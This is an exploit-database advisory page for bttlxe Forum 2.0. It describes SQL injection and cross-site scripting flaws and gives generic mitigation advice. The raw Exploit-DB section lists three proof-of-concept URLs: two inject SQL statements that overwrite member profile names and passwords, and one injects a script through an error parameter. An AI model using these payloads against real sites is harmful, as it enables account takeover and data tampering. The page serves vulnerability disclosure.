header-logo
Suggest Exploit
vendor:
bttlxe Forum
by:
Unknown
7.5
CVSS
HIGH
SQL-injection, Cross-site scripting
89, 79
CWE
Product Name: bttlxe Forum
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE:
CPE: bttlxe_forum
Metasploit:
Other Scripts:
Platforms Tested:
2008

Multiple input-validation vulnerabilities in bttlxe Forum

The bttlxe Forum is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue. These vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input validation and sanitization techniques. Additionally, keeping the application and underlying software up-to-date with the latest patches and security fixes can help prevent exploitation.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26790/info

bttlxe Forum is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

These issues affect bttlxe Forum 2.0; other versions may also be affected. 

http://www.example.com/myaccount/viewProfile.asp?member='update Members set ProfileName='hacked';--
http://www.example.com/myaccount/viewProfile.asp?member='update Members set Password='hacked';-- 
http://www.example.com/myaccount/failure.asp?err_txt="><script>alert('Aria-Security.Net')</script>